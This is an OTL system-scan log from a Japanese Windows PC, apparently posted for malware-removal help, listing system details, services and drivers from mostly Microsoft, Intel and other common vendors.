Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 6.58 Gb Available Physical Memory | 83.54% Memory free
9.13 Gb Paging File | 7.90 Gb Available in Paging File | 86.54% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.25 Gb Free Space | 7.71% Space Free | Partition Type: NTFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/02/21 08:49:18 | 000,780,800 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,366,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2014/10/31 13:51:25 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/10/29 12:59:51 | 003,460,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:[b]64bit:[/b] - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:19 | 000,026,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:03 | 000,041,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:[b]64bit:[/b] - [2014/10/29 11:34:51 | 000,067,584 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:[b]64bit:[/b] - [2014/10/29 11:33:55 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:29:22 | 000,121,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:57:05 | 000,324,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\BthHFSrv.dll -- (BthHFSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:48:20 | 000,166,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:21 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:21 | 000,838,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:02 | 000,294,912 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:37 | 000,131,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:20:03 | 000,262,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:17 | 000,154,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:24 | 000,374,784 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:02 | 000,260,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:36 | 000,407,040 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:22 | 000,270,336 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:[b]64bit:[/b] - [2014/10/29 10:11:10 | 001,639,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:09:48 | 000,521,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:05:09 | 000,206,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:57:18 | 000,074,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:[b]64bit:[/b] - [2014/10/29 09:48:52 | 000,562,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:[b]64bit:[/b] - [2014/10/29 09:46:48 | 001,348,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:35:51 | 001,668,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:[b]64bit:[/b] - [2014/10/01 19:54:24 | 000,319,376 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Windows\SysNative\igfxCUIService.exe -- (igfxCUIService1.0.0.0)
SRV:[b]64bit:[/b] - [2012/08/14 18:03:42 | 000,027,792 | ---- | M] (VIA Technologies, Inc.) [Auto | Stopped] -- C:\Windows\SysNative\ViakaraokeSrv.exe -- (VIAKaraokeService)
SRV:[b]64bit:[/b] - [2012/06/19 19:10:34 | 000,634,632 | ---- | M] (Intel(R) Corporation) [Auto | Stopped] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV - [2015/04/15 01:48:07 | 000,268,464 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/04/03 14:37:50 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/02/18 19:11:32 | 000,315,488 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 15:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2014/10/29 10:51:55 | 000,017,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2014/10/29 10:04:45 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2014/10/29 09:53:11 | 000,367,104 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2014/10/01 19:54:28 | 000,281,488 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2014/08/14 07:30:50 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/03/04 10:10:14 | 000,122,464 | ---- | M] (株式会社ネットビジョン) [On_Demand | Stopped] -- C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe -- (auWifiConnectSvc)
SRV - [2013/12/18 01:56:16 | 000,754,712 | ---- | M] (Google Inc.) [Auto | Stopped] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2012/09/17 17:19:50 | 000,364,416 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/09/17 17:19:48 | 000,276,864 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/09/17 17:19:34 | 000,165,760 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2007/09/05 14:38:28 | 000,174,624 | ---- | M] () [Auto | Stopped] -- C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe -- (TangoCoreService)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/03/04 19:25:11 | 000,377,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,264,000 | ---- | M] (Microsoft Corporation) [File_System | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,114,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:04 | 000,044,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:[b]64bit:[/b] - [2014/12/12 09:51:20 | 000,075,776 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:[b]64bit:[/b] - [2014/11/13 21:35:31 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:47 | 000,415,040 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:12 | 000,136,512 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:[b]64bit:[/b] - [2014/10/29 12:57:42 | 000,054,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:[b]64bit:[/b] - [2014/10/29 12:56:04 | 000,027,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:43 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:41 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:09 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:54 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:39 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:16 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:[b]64bit:[/b] - [2014/10/15 17:32:36 | 000,921,920 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,238,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,086,336 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,039,744 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:[b]64bit:[/b] - [2014/10/08 18:24:09 | 000,467,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,324,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,189,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:[b]64bit:[/b] - [2014/10/07 15:44:39 | 000,069,952 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:[b]64bit:[/b] - [2014/10/01 19:54:16 | 003,828,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2014/09/24 16:27:11 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:[b]64bit:[/b] - [2014/09/24 15:58:01 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:48 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:[b]64bit:[/b] - [2014/09/24 15:29:18 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:[b]64bit:[/b] - [2014/08/15 09:36:55 | 000,146,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,038,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,027,032 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2013/08/22 21:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:[b]64bit:[/b] - [2013/08/22 21:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
